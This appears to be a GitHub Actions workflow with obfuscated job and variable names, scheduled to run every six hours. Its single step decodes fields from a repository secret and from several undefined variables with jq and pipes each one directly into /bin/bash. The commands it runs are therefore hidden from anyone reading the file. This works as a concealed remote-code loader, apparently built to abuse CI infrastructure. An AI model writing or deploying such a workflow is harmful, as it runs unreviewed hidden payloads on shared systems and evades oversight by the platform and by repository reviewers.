name: taofeiji3489
on:
  workflow_dispatch:
  schedule:
    - cron: '49 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: taofeiji3489
        env:
          rr11: ${{ secrets.rr11 }}
        run: |
          echo $rr11 | jq -r .vnk652 | /bin/bash
          echo $vx12 | jq -r .vdix02995 | /bin/bash
          echo $en7 | jq -r .jc0 | /bin/bash
          echo $gcq9984 | jq -r .qodns459 | /bin/bash
          echo $b95370 | jq -r .wuxi8 | /bin/bash
          echo $xkciv97 | jq -r .s589 | /bin/bash
          echo $hmjv98543 | jq -r .jlzaz8 | /bin/bash
          echo $b418 | jq -r .znzjo57027 | /bin/bash
          echo $pc58322 | jq -r .w48 | /bin/bash
          echo $n25387 | jq -r .nuz65143 | /bin/bash
          echo $lh9 | jq -r .fnv64 | /bin/bash
          echo $xsy09 | jq -r .kg924 | /bin/bash

